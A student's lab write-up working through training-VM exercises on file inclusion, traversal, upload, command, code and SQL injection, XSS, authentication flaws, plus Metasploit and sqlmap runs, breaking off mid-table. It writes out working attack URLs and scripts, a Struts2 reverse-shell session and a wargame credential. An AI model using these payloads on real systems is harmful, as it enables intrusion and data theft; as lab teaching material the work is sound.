## A0 Lab:
**Do the nmap and wfuzz tools get similar results for each site?**
No, wfuzz tools printed out the admin, secret, and file directories I created. However, nmap, couldn’t find any directories except for the wordpress server. For the wordpress server, nmaps finds a few files that it interested in and provided it’s guess on what the file could be for.
![screenshot](img/screenshot0.png)

**Provide screenshots of each tool’s output on the Windows web server VM
![screenshot](img/screenshot1.png)


In [1]:
%%bash
nmap --script http-enum 35.203.179.141


Starting Nmap 7.40 ( https://nmap.org ) at 2017-11-13 21:12 UTC
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.80 seconds


## A4/A7
### WFP1: File include
#### Example 1
(my iso image is mapped to `http://vulnerable/`)
LFI: In url go to `http://vulnerable/fileincl/example1.php?page=file:///etc/passwd`, this returns file /etc/passwd from the local machine.

![](img/LFI.png)

RFI: In url go to `http://vulnerable/fileincl/example1.php?page=http://google.com`, this wraps google front page into my vulnerable website

![](img/RFI.png)

#### Example 2
LFI: In url go to `http://vulnerable/fileincl/example2.php?page=file:///etc/passwd%00`, this returns file /etc/passwd from the local machine. I append the null terminating character to the end of the file I want to access in order to escape the .php extension

![](img/LFI.png)

RFI: In url go to `http://vulnerable/fileincl/example1.php?page=http://google.com%00`, this wraps google front page into my vulnerable website. I append the null terminating character to the end of the url I want to access in order to escape the .php extension

![](img/LFI.png)

### WFP1: XML
#### Example 1
LFI: Go to `http://vulnerable/xml/example1.php?xml=%3C!DOCTYPE%20mydoc%20[%3C!ENTITY%20x%20SYSTEM%20%22file:///etc/passwd%22%3E]%3E%3Ctest%3E%26x;%3C/test%3E`, this returns the /etc/passwd file on the system. I had to url encode all symbols for this to work.

![xml](img/xml_LFI.png)

### WFP1: Directory traversal
#### Example 1
LFI: Go to `http://vulnerable/dirtrav/example1.php?file=../../../../../../etc/passwd`. use ../../ sequence to get back to the root directory then access the passwd file

![Directory traversal](img/dir_trav_1.png)

#### Example 2
LFI: Go to `http://vulnerable/dirtrav/example2.php?file=/var/www/files/../../../../../../etc/passwd`. use ../../ after `/var/www/files/` to make sure the filter is by passed before traverse back to the root directory.

![Directory traversal](img/dir_trav_2.png)

#### Example 3
LFI: Go to `http://vulnerable/dirtrav/example3.php?file=../../../../../../../../etc/passwd%00`. Similar to Example 1 but I need to add `%00` to terminate the string before the .png extension 

![Directory traversal](img/dir_trav_3.png)

### WFP1: File upload
#### Example 1
craft a php file with content of `<?php system('cd / && ls'); ?>`. Then upload the file. Download the result then it contains the directory listing of the root.

![dir list](img/file_upload_1_dir_list.png)
#### Example 2
craft a php file with content of `<?php system('cd / && ls'); ?>` and extensio of .php3. Then upload the file. Download the result then it contains the directory listing of the root.

![dir list](img/file_upload_2_dir_list.png)

### WFP2: Authorization
#### Example 1
(My WFP2 server is at 172.16.230.165)
First login with provided username and password. Copy the urls of confidental links then log out and got to`http://172.16.230.165/authorization/example1/infos/1` or `http://172.16.230.165/authorization/example1/infos/2`

![authorization](img/authorization_1.png)

#### Example 2
First login with provided username and password for user 1. Then go to user1's confidental link `http://172.16.230.165/authorization/example2/infos/1`, try to increment the last number and go to `http://172.16.230.165/authorization/example2/infos/3`. I can see user2's confidental content from user1.

![authorization](img/authorization_2.png)
#### Example 3
First login with provided username and password for user 1. Then go to user1's confidental link. Click edit this link. I noticed there is another number to mess with so I changed it to 3. And I got user2's confidental information. `http://172.16.230.165/authorization/example3/infos/edit/3`

![authorization](img/authorization_3.png)

## A6
### WFP2: Randomness Issues
#### Example 1
copy and paste run part of the source code in ruby. Since the Random seed is not random. It's very easy to get the password by just reruning the source code=>
```
   s = Random.new(0)
=> #<Random:0x00555a75065958>
   pass = 6.times.map { ('a'..'z').to_a[s.rand(('a'..'z').to_a.size)]}.join
=> "mpvadd"
   pass2 = 6.times.map { ('a'..'z').to_a[s.rand(('a'..'z').to_a.size)]}.join
=> "hjtvse"
```
![A6_e1.png](img/A6_e1.png)

#### Example 2
run ruby code, this will brute force the account creation time and print out the password for admin:
```
t = Time.now.to_i
pass = ""
while pass != "mtlrho"
  s = Random.new(t)
  a=6.times.map { ('a'..'z').to_a[s.rand(('a'..'z').to_a.size)]}.join
  pass = 6.times.map { ('a'..'z').to_a[s.rand(('a'..'z').to_a.size)]}.join
  if pass == "mtlrho"
    print "GOT IT"+"\n"
    print t, "\n"
    print a +"\n"
    break
  end
  t = t - 1
end
```
this gave result, where 1507578671 is the unix time and `lngqle` is the password for :
```
GOT IT
1507578671
lngqle
```

![A6_e2.png](img/A6_e2.png)

#### Example 3
run ruby script, this prints out pass1 which is the admin password:
```
s = Random.new(0)
pass1 = (6+s.rand(5)).times.map { ('a'..'z').to_a[s.rand(('a'..'z').to_a.size)]}.join
pass2 = (6+s.rand(5)).times.map { ('a'..'z').to_a[s.rand(('a'..'z').to_a.size)]}.join
print pass1
```

output:
```
print pass1
pvaddhjtvs=> nil
```

even though the developer tries to randomize the password length, the seed and length is chosen deterministically. We can get the password simply be re-running the source code. 

![A6_e3.png](img/A6_e3.png)

#### Example 4
run ruby script, this brute forces the number of random values has been thrown away from 0 up to 1000
Then it prints out the admin's password when a match is found:
```
i = 0
pass1 = ""
pass2 = ""
while pass2 != "iszyhk" and i <= 1000
  s = Random.new(0)
  rand(1000) # throw away the first rand value
  i.times {s.rand(5)} # throw away the first i rand values
  pass1 = 6.times.map { ('a'..'z').to_a[s.rand(('a'..'z').to_a.size)]}.join
  pass2 = 6.times.map { ('a'..'z').to_a[s.rand(('a'..'z').to_a.size)]}.join
  i = i+1
  if pass2 == "iszyhk"
    print "GOT IT" + "\n"
    print i,"\n"
    print pass1 + "\n"
  end
end
```
output:
```
GOT IT
643
dzsysu
```

![A6_e4.png](img/A6_e4.png)

# A1 Part 1

## WFP1: Command injection

### Example #1
use `;` to start injection and add payload `cat /etc/passwd` to get the password file
go to url `http://vulnerable/commandexec/example1.php?ip=127.0.0.1;%20cat%20/etc/passwd`
![E1](img/A1p1_command_injection_e1.png)

### Example #2
use `%0A` newline to end the ip address and start a name query. Instead of using special characters, encode `;ls /` in url encoding:
go to url `http://vulnerable/commandexec/example2.php?ip=127.0.0.1%0A%?name=%3Bls%20%2F`
![E1](img/A1p1_command_injection_e2.png)

### Example #3
In python, run code below. I need to set allow_redirects to False to disable redirects:
```
import requests
resp = requests.get('http://vulnerable/commandexec/example3.php?ip=127.0.0.1;%20uname%20-a', allow_redirects=False)
print(resp.text)
```
the output is:
```
...
    <div class="container">



<pre>
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_req=1 ttl=64 time=0.010 ms
64 bytes from 127.0.0.1: icmp_req=2 ttl=64 time=0.020 ms

--- 127.0.0.1 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 999ms
rtt min/avg/max/mdev = 0.010/0.015/0.020/0.005 ms
Linux debian 2.6.32-5-686 #1 SMP Fri May 10 08:33:48 UTC 2013 i686 GNU/Linux
</pre>
      <footer>
        <p>&copy; PentesterLab 2013</p>
      </footer>

    </div> <!-- /container -->


  </body>
</html>
```

## WFP1: Code injection

### Example #1
encode `" . system("uname -a");` in url encoding then append `//` to skip what's in the php later:
go to ```http://vulnerable/codeexec/example1.php?name=hacker%22%20.%20system(%22uname%20-a%22);%20//```
![E1](img/A1p2_code_injection_e1.png)

### Example #2
when I ran `http://vulnerable/codeexec/example2.php?order=id));}//`
I got `Parse error: syntax error, unexpected ')' in /var/www/codeexec/example2.php(22) : runtime-created function on line 1 Warning: usort() expects parameter 2 to be a valid callback, no array or string given in /var/www/codeexec/example2.php on line 22`

which means I broke the code execution on the app. I can inject a second parameter right after `order=id`, like below:
go to `http://vulnerable/codeexec/example2.php?order=id,system(%22uname%20-a%22));}//`
![E1](img/A1p2_code_injection_e2.png)

### Example #3
after I tried: `http://vulnerable/codeexec/example3.php?new=hacker&pattern=/lamer/&base=Hello%20lamer&pattern=/lamer/e`
I got `Notice: Use of undefined constant hacker - assumed 'hacker' in /var/www/codeexec/example3.php(3) : regexp code on line 1 Hello hacker`

Which mean hacker is interpreted as a variable in the php code. I can use the `new` field to inject php code that does what I want:
`http://vulnerable/codeexec/example3.php?new=phpinfo()&pattern=/lamer/&base=Hello%20lamer&pattern=/lamer/e`
![E1](img/A1p2_code_injection_e3.png)

Or I can inject shell code like this:
`http://vulnerable/codeexec/example3.php?new=shell_exec(%27cat%20/etc/passwd%27)&pattern=/lamer/&base=Hello%20lamer&pattern=/lamer/e`
![E1](img/A1p2_code_injection_e32.png)

### Example #4
When I tried `'` it gave me a code error stating `assert()` is checking the input. So I guess the source would look something like `assert('$_GET['name']',"can't evaluate '$_GET['name']'")`
I can use `'` to break the string and use `.` to concatnate php code like:
`http://vulnerable/codeexec/example4.php?name=hacker%27.phpinfo().%27`
![E1](img/A1p2_code_injection_e4.png)

# A1 Part 2

## WFP1: SQL injection
### Example #1

When I tried `?name=root'` this broke the syntax. So I know username is quoted using single quotes. 
Therefore I used `?name=root' or name like '%%` to dump the users

``` http://vulnerable/sqli/example1.php?name=root%27%20or%20name%20like%20%27%% ```

![](img/A1p2_wfp1_sql_injection_e1.png)

### Example #2

When I tried payload from example 1 it gave me `Error no space` I know space character is not allow, so I need to encode spaces. I tried to encode spaces to `%20` and it gave me the same error. So I have another option to use newline instead of spaces: `?name=root'%0Aor%0Aname%0Alike%0A'%%`

``` http://vulnerable/sqli/example2.php?name=root%27%0Aor%0Aname%0Alike%0A%27%% ```
![](img/A1p2_wfp1_sql_injection_e2.png)

### Example #3

When I tried payload from example 2 it gave me `Error no space`. Since all white spaces are filtered, I need another way to seperate SQL statements. It was mentioned c-style comments are accepted so I figure I can use `/**/` as a seperater. Luckly that worked:
``` http://vulnerable/sqli/example3.php?name=root%27/**/or/**/name/**/like/**/%27%% ```

![](img/A1p2_wfp1_sql_injection_e3.png)

### Example #4

Since we can use arithmetic operators we can do `4+1` to get 5

``` http://vulnerable/sqli/example4.php?id=4%2b1 ```
![](img/A1p2_wfp1_sql_injection_e4.png)

### Example #5
Just do a simple sql injection using `or 1=1`
``` http://vulnerable/sqli/example5.php?id=1%20or%201=1 ```
![](img/A1p2_wfp1_sql_injection_e5.png)

### Example #6
Payload from last example worked

``` http://vulnerable/sqli/example6.php?id=1%20or%201=1 ```
![](img/A1p2_wfp1_sql_injection_e6.png)

This filter doesn't prevent injection either since it only matches the tail with integers, we need it to verify that the whole input should be an integer like this:

```
if (!preg_match('/^[0-9]+$/', $_GET["id"])) {
    die("ERROR INTEGER REQUIRED");
}
```

### Example #7

Since multiline works I just use `%0A` to encode linebreak then insert payload `or 1=1`

`http://vulnerable/sqli/example7.php?id=2%0Aor%201=1`
![](img/A1p2_wfp1_sql_injection_e7.png)

### Example #8

To have it ordered the other way we simply need to change ```ORDER BY `NAME` ``` to ```ORDER BY `NAME` DESC ```

``` http://vulnerable/sqli/example8.php?order=name`%20desc%20--%20 ```

![](img/A1p2_wfp1_sql_injection_e8.png)

### Example #9
To have it ordered the other way we simply need to change ```ORDER BY NAME ``` to ```ORDER BY NAME DESC ```

```http://vulnerable/sqli/example9.php?order=name%20desc%20--%20```
![](img/A1p2_wfp1_sql_injection_e9.png)

## WFP2: SQL injections
### Example #1
Just try simple SQL inject on username `admin' or 1=1 #`. `#` is needed to escape password field

``` http://172.16.230.165/sqlinjection/example1/?username=admin%27+or+1%3D1%23&password=&submit=Submit ```
![](img/A1p2_wfp2_sql_injection_e1.png)

### Example #2
Enter `admin' or 1=1 LIMIT 1 #` in the username field allows the query to return exactly one field, which allows the user to login

```http://172.16.230.165/sqlinjection/example2/?username=admin%27+or+1%3D1+LIMIT+1+%23&password=&submit=Submit```
![](img/A1p2_wfp2_sql_injection_e2.png)

### Example #3

Since `'` is now being filtered I can escape it from the username field: input `\` in the username field, the input the injection payload to the password field ` or 1=1 #`

```http://172.16.230.165/sqlinjection/example3/?username=%5C&password=+or+1%3D1+%23&submit=Submit```

![](img/A1p2_wfp2_sql_injection_e3.png)

### Example #4
I can use something like `username like '%%'` to get all users since the url looks like sql query `username='hacker'`. `%` need to be encoded as `%25` for this to work:

``` http://172.16.230.165/sqlinjection/example4/?req=username%20like%20%27%25%25%27 ```
![](img/A1p2_wfp2_sql_injection_e4.png)

### Example #5

First I tried to get table names:

``` http://172.16.230.165/sqlinjection/example5/?limit=3%20union%20select%20table_name,table_name,table_name%20from%20INFORMATION_SCHEMA.TABLES ```

It returns all tablenames in the database. There is one that I'm interested: `users`

![](img/A1p2_wfp2_sql_injection_e5_1.png)

Then I made another query to get all users

``` http://172.16.230.165/sqlinjection/example5/?limit=3%20union%20select%20*%20from%20users ```

![](img/A1p2_wfp2_sql_injection_e5_2.png)

### Example #6

Continue from Example 5 query the same table to get all of the users

``` http://172.16.230.165/sqlinjection/example6/?group=username%20union%20select%20*%20from%20users ```
![](img/A1p2_wfp2_sql_injection_e6.png)

### Example #7

Basically I can biggie back on the sql query to execute mysql functions and read results from error returned:
For example, `connection_id()` gives me the id number of this current connection.

``` http://172.16.230.165/sqlinjection/example7/?id=extractvalue(%27%3Cxml%3E%27,concat(%22/%22,connection_id())) ```

![](img/A1p2_wfp2_sql_injection_e7.png)

### Example #8

first create a user named 'admin' as victim. Then create user with name ` ' or 1!=1 union select * from users where username='admin' # ` as injection payload. When clicked on that user id we get the information for admin

![](img/A1p2_wfp2_sql_injection_e8.png)

### Example #9

Adding a backslash throws off the attempt to escape single quote. Therefore to allow for SQL injection

```
http://172.16.230.165/sqlinjection/example9/?username=%E5%91%B5%5c%27%20or%201=1%20--%20&password=&submit=Submit
```

![](img/A1p2_wfp2_sql_injection_e9.png)

## WFP2: MongoDB injection
### Example #1

Just rewrite SQL injection as ` ' || "1"=="1" // ` use that as username and submit
```
http://172.16.230.165/mongodb/example1/?username=%27+%7C%7C+%221%22%3D%3D%221%22+%2F%2F&password=&submit=Submit
```
![](img/A1p2_wfp2_mongodb_e1.png)

## WFP2: Mass Assignment
### Example #1

Add admin right to user created by adding `user%5Badmin%5D=1` to the request
```
http://172.16.230.165/massassign/example1/signup?user%5Busername%5D=sh&user%5Bpassword%5D=dfdf&user%5Badmin%5D=1&submit=Submit
```

![](img/A1p2_wfp2_massass_e1.png)

### Example #2

Similar to Example 1, I can create a user first then update profile of the user using the same technique to made it an admin account
```
http://172.16.230.165/massassign/example2/update_profile?user%5Busername%5D=sh&user%5Bpassword%5D=dasd&user%5Badmin%5D=1&submit=Submit
```

![](img/A1p2_wfp2_massass_e2.png)

### Example #3

add `user[company_id]=2` to url request to modify user profile:
```
http://172.16.230.165/massassign/example3/update_profile?user%5Busername%5D=user1&user%5Bpassword%5D=123&user%5Bcompany_id%5D=2&submit=Submit
```

![](img/A1p2_wfp2_massass_e3.png)



# A2: Labs
## WFP2: Authentication

### Example #1
Tried trivial username/password admin and admin got us to the success page.
![](img/A2_Authentication_e1.png)

### Example #3
Used python script:
```
    import requests
   
    session = requests.Session()
    cookie = {"user":"admin"}
    resp = session.get("http://172.16.230.165/authentication/example3",cookies=cookie)
    print(resp.text)
```
Also tried in postman to get the browser using cookie with user=admin and got the success page.
![](img/A2_Authentication_e3.png)

### Example #4
Used python script:
```
import requests
import hashlib
session = requests.Session()
user = "admin"
s = hashlib.md5()
s.update(user.encode())
user_md5 = s.hexdigest()
cookie = {"user":user_md5}
resp = session.get("http://172.16.230.165/authentication/example4",cookies=cookie)
print(resp.text)
```
Also tried in postman to get the browser using cookie with `user=21232f297a57a5a743894a0e4a801fc3` and got the success page.
![](img/A2_Authentication_e4.png)

### Example #5
I registered a user under name `Admin` then logged in as `admin`. There is a mismatch of case sensitivity of frontend and the backend.
![](img/A2_Authentication_e5.png)

### Example #6
I registerd a user under name `admin ` then logged in as `admin`. There is a white space mismatch of the frontend and the backend.
![](img/A2_Authentication_e6.png)

# A3/A10: Labs

## A3 WFP1: XSS

### Example #1

/Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --disable-xss-auditor
Use simple xss by going to:
```
http://vulnerable/xss/example1.php?name=%3Cscript%3Ealert("xss")%3C/script%3E
```

![](img/A3_wfp1_xss_e1.png)

### Example #2
Randomly capitalize the script tags to avoid the filtering:
```
http://vulnerable/xss/example2.php?name=%3CScript%3Elocation.assign(%22http://cs410.oregonctf.org%22)%3C/sCript%3E
```

![](img/A3_wfp1_xss_e2.png)

### Example #3
To avoid filtering I nested the script tag like this `<script<script>>`
```
http://vulnerable/xss/example3.php?name=%3CscrIpt%3CscrIpt%3E%3Ealert(%22Xin%20Wang%22)%3C/scrIpt%3C/scRipt%3E%3E
```

![](img/A3_wfp1_xss_e3.png)

### Example #4
Script tag has been disabled so I need to use actions on other objects.
I made a `<a>here</a>` object which has action if mouse hovers over the text it executes the alert window.
```
http://vulnerable/xss/example4.php?name=%3Ca%20onmouseover=%22alert(%27Xin%20Wang%27)%22%3Ehere%3C/a%3E
```

![](img/A3_wfp1_xss_e4.png)

### Example #5
`alert` is filtered so I need to convert unicode to characters. The unicode encoding for `alert("Xin Wang")` is 
`97,108,101,114,116,40,34,88,105,110,32,87,97,110,103,34,41`. So I used `String.fromCharCode()` to convert it into string then `eval` that string to execute the command:
```
http://vulnerable/xss/example5.php?name=%3Cscript%3Eeval(String.fromCharCode(97,108,101,114,116,40,34,88,105,110,32,87,97,110,103,34,41))%3C/script%3E
```

![](img/A3_wfp1_xss_e5.png)

### Example #6
The script echoed back was `var <dollar sign>a="hacker";`
So I used a "; to terminate the var and start my injection. Then I used // to skip the code after the injection.

```
http://vulnerable/xss/example6.php?name=";alert("Xin Wang");//
```

![](img/A3_wfp1_xss_e6.png)

### Example #7
Simply change the double quotes to single:

```
http://vulnerable/xss/example7.php?name=';alert('Xin Wang');//
```

![](img/A3_wfp1_xss_e7.png)

### Example #8



### Example #9
Use document.body.textContent to display the content of the webpage in an alert window:

```
http://vulnerable/xss/example9.php#<script>alert(document.body.textContent);</script>
```

![](img/A3_wfp1_xss_e9.png)



# X1: Labs
## Metasploit Apache Struts2 on Google Cloud

Open metasploit msfconsole then search for struts2 vulnerability

```
msf > search strut2
[!] Module database cache not built yet, using slow search

Matching Modules
================

   Name                                             Disclosure Date  Rank       Description
   ----                                             ---------------  ----       -----------
   exploit/multi/http/struts2_content_type_ognl     2017-03-07       excellent  Apache Struts Jakarta Multipart Parser OGNL Injection
   exploit/multi/http/struts2_rest_xstream          2017-09-05       excellent  Apache Struts 2 REST Plugin XStream RCE
   exploit/multi/http/struts_code_exec_classloader  2014-03-06       manual     Apache Struts ClassLoader Manipulation Remote Code Execution
   exploit/multi/http/struts_code_exec_parameters   2011-10-01       excellent  Apache Struts ParametersInterceptor Remote Code Execution
   exploit/multi/http/struts_dev_mode               2012-01-06       excellent  Apache Struts 2 Developer Mode OGNL Execution

msf > use exploit/multi/http/struts2_content_type_ognl
msf exploit(struts2_content_type_ognl) > set RHOST 10.128.0.6
RHOST => 10.128.0.6
msf exploit(struts2_content_type_ognl) > set LHOST 10.128.0.3
LHOST => 10.128.0.3
msf exploit(struts2_content_type_ognl) > set RPORT 80
RPORT => 80
msf exploit(struts2_content_type_ognl) > TARGETURI​ ​/showcase
[-] Unknown command: TARGETURI​.
msf exploit(struts2_content_type_ognl) > set TARGETURI /showcase
TARGETURI => /showcase
msf exploit(struts2_content_type_ognl) > show options

Module options (exploit/multi/http/struts2_content_type_ognl):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      10.128.0.6       yes       The target address
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /showcase        yes       The path to a struts application action
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Universal
msf exploit(struts2_content_type_ognl) > set​ ​PAYLOAD​ ​linux/x64/shell/reverse_tcp
[-] Unknown command: set​.
msf exploit(struts2_content_type_ognl) > set PAYLOAD linux/x64/shell/reverse_tcp
PAYLOAD => linux/x64/shell/reverse_tcp
msf exploit(struts2_content_type_ognl) > set LPORT 80
LPORT => 80
msf exploit(struts2_content_type_ognl) > exploit

[*] Started reverse TCP handler on 10.128.0.3:80
[*] Sending stage (38 bytes) to 10.128.0.6
[*] Command shell session 1 opened (10.128.0.3:80 -> 10.128.0.6:58744) at 2017-11-20 16:07:46 -0500

ls
LICENSE
NOTICE
RELEASE-NOTES
RUNNING.txt
bin
conf
include
lib
logs
native-jni-lib
temp
velocity.log
webapps
work
cd webapps
```

![](img/X1_struts2.png)

## Metasploit WFP on Google Cloud
in msfconsole type `use auxiliary/scanner/http/dir_scanner` to use directory scanner for wfp1 then `set RHOSTS 10.128.0.4` to set target server(wfp1) then `exploit` to run the exploit.

```

[*] Detecting error code
[*] Using code '404' as not found for 10.128.0.4
[+] Found http://10.128.0.4:80/cgi-bin/ 403 (10.128.0.4)
[+] Found http://10.128.0.4:80/css/ 200 (10.128.0.4)
[+] Found http://10.128.0.4:80/doc/ 403 (10.128.0.4)
[+] Found http://10.128.0.4:80/files/ 200 (10.128.0.4)
[+] Found http://10.128.0.4:80/footer/ 200 (10.128.0.4)
[+] Found http://10.128.0.4:80/icons/ 403 (10.128.0.4)
[+] Found http://10.128.0.4:80/img/ 200 (10.128.0.4)
[+] Found http://10.128.0.4:80/index/ 200 (10.128.0.4)
[+] Found http://10.128.0.4:80/js/ 200 (10.128.0.4)
[+] Found http://10.128.0.4:80/ldap/ 200 (10.128.0.4)
[+] Found http://10.128.0.4:80/upload/ 200 (10.128.0.4)
[+] Found http://10.128.0.4:80/xml/ 200 (10.128.0.4)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

result returned directories on the server.

Brute force http auth credentials:`use auxiliary/scanner/http/http_login` to use http login exploit. Again set the RHOST to wfp2 server address `set RHOSTS 10.128.0.5` then set authenticate uri to example one `set AUTH_URI /authentication/example1/`. Then run `exploit` and the result from exploit gives the correct result:

```
[*] Attempting to login to http://10.128.0.5:80/authentication/example1/
[+] 10.128.0.5:80 - Success: 'admin:admin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

## sqlmap on Google Cloud
Run sqlmap on example 1 sql injection: `sqlmap -u \
'http://10.128.0.4/sqli/example1.php?name=root' \
--batch --dbms mysql --dump`

Injection points discovered, and corresponding payloads were:
```
GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: name (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: name=root' AND SLEEP(5) AND 'zSyP'='zSyP

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: name=root' UNION ALL SELECT NULL,CONCAT(0x717a767671,0x6f46484b534551515647644a4c4d786a794d566a5a707974455a4871504744434d58595167524d59,0x71786b6b71),NULL,NULL,NULL-- QSvt
---
```

user table dump:

```
[15:01:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[15:01:20] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:01:20] [INFO] fetching current database
[15:01:20] [INFO] fetching tables for database: 'exercises'
[15:01:20] [INFO] fetching columns for table 'users' in database 'exercises'
[15:01:20] [INFO] fetching entries for table 'users' in database 'exercises'
[15:01:20] [INFO] analyzing table dump for possible password hashes
Database: exercises
Table: users
[4 entries]
+----+---------+-----+-------+---------+
| id | groupid | age | name  | passwd  |
+----+---------+-----+-------+---------+
| 1  | 10      | 10  | admin | admin   |
| 2  | 0       | 30  | root  | admin21 |
| 3  | 2       | 5   | user1 | secret  |
| 5  | 5       | 2   | user2 | azerty  |
+----+---------+-----+-------+---------+

[15:01:20] [INFO] table 'exercises.users' dumped to CSV file '/root/.sqlmap/output/10.128.0.4/dump/exercises/users.csv'
[15:01:20] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.128.0.4'

[*] shutting down at 15:01:20
```

Run sqli on wfp1 example 2:
`sqlmap -u \
'http://10.128.0.4/sqli/example2.php?name=root' \
--dbms mysql --dump --tamper=space2randomblank`

from below output we can see the exploit uses a time-based blind sql injection:

```
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: name (GET)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: name=root' AND SLEEP(5) AND 'gNpy'='gNpy

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: name=root' UNION ALL SELECT NULL,NULL,CONCAT(0x7170786b71,0x78464c6c497743514d74536b6d4342695a7170534d4c7379526a56686e64765570514c64794a7376,0x717a6b6271),NULL,NULL-- Gocb
---
[15:07:51] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[15:07:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS: MySQL >= 5.0.12
[15:07:51] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:07:51] [INFO] fetching current database
[15:07:51] [INFO] fetching tables for database: 'exercises'
[15:07:51] [INFO] the SQL query used returns 1 entries
[15:07:51] [INFO] fetching columns for table 'users' in database 'exercises'
[15:07:51] [WARNING] the SQL query provided does not return any output
[15:07:51] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[15:07:51] [WARNING] unable to retrieve column names for table 'users' in database 'exercises'
do you want to use common column existence check? [y/N/q] y
which common columns (wordlist) file do you want to use?
[1] default '/usr/share/sqlmap/txt/common-columns.txt' (press Enter)
[2] custom
> 1
[15:08:01] [INFO] checking column existence using items from '/usr/share/sqlmap/txt/common-columns.txt'
[15:08:01] [INFO] adding words used on web page to the check list
please enter number of threads? [Enter for 1 (current)]
[15:08:27] [WARNING] running in a single-thread mode. This could take a while
[15:08:27] [INFO] retrieved: name
[15:08:28] [INFO] retrieved: groupid
[15:08:33] [INFO] retrieved: age
[15:08:37] [INFO] retrieved: name
[15:08:37] [INFO] retrieved: age

[15:08:37] [INFO] fetching entries for table 'users' in database 'exercises'
[15:08:37] [INFO] the SQL query used returns 4 entries
[15:08:37] [INFO] retrieved: "30","0","root"
[15:08:37] [INFO] retrieved: "5","2","user1"
[15:08:37] [INFO] retrieved: "2","5","user2"
[15:08:37] [INFO] analyzing table dump for possible password hashes
Database: exercises
Table: users
[3 entries]
+---------+-----+-------+
| groupid | age | name  |
+---------+-----+-------+
| 0       | 30  | root  |
| 2       | 5   | user1 |
| 5       | 2   | user2 |
+---------+-----+-------+

[15:08:37] [INFO] table 'exercises.users' dumped to CSV file '/root/.sqlmap/output/10.128.0.4/dump/exercises/users.csv'
[15:08:37] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.128.0.4'

[*] shutting down at 15:08:37
```

natas15 Blind SQL injection:

```
sqlmap -u 'http://natas15.natas.labs.overthewire.org' \
 --auth-type basic \
 --auth-cred natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J \
 --data username=foo \
 --dbms mysql \
 --dump \
 --level 2 \
 --batch \
 --time-sec 1
```
as we can see from the output, it uses a time based blind sql injection to get the flag:
```
sqlmap identified the following injection point(s) with a total of 301 HTTP(s) requests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=foo" AND (SELECT * FROM (SELECT(SLEEP(5)))grSp) AND "SLAo"="SLAo
---
[15:22:05] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[15:22:05] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[15:22:05] [INFO] fetching current database
[15:22:05] [INFO] retrieved:
[15:22:06] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[15:22:36] [INFO] adjusting time delay to 1 second due to good response times
natas15
[15:22:56] [INFO] fetching tables for database: 'natas15'
[15:22:56] [INFO] fetching number of tables for database 'natas15'
[15:22:56] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
1
[15:23:02] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
users
[15:23:25] [INFO] fetching columns for table 'users' in database 'natas15'
[15:23:25] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
2
[15:23:32] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
username
[15:24:05] [INFO] retrieved:
password
[15:24:40] [INFO] fetching entries for table 'users' in database 'natas15'
[15:24:40] [INFO] fetching number of entries for table 'users' in database 'natas15'
[15:24:40] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
4
[15:24:45] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
6P151OntQe
[15:25:34] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
bob
[15:25:50] [INFO] retrieved: HLwuGKts2w
[15:26:40] [INFO] retrieved: charlie
[15:27:05] [INFO] retrieved: hROtsfM734
[15:27:55] [INFO] retrieved: alice
[15:28:12] [INFO] retrieved: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
[15:30:36] [INFO] retrieved: natas16
[15:31:01] [INFO] analyzing table dump for possible password hashes
Database: natas15
Table: users
[4 entries]
+----------+----------------------------------+
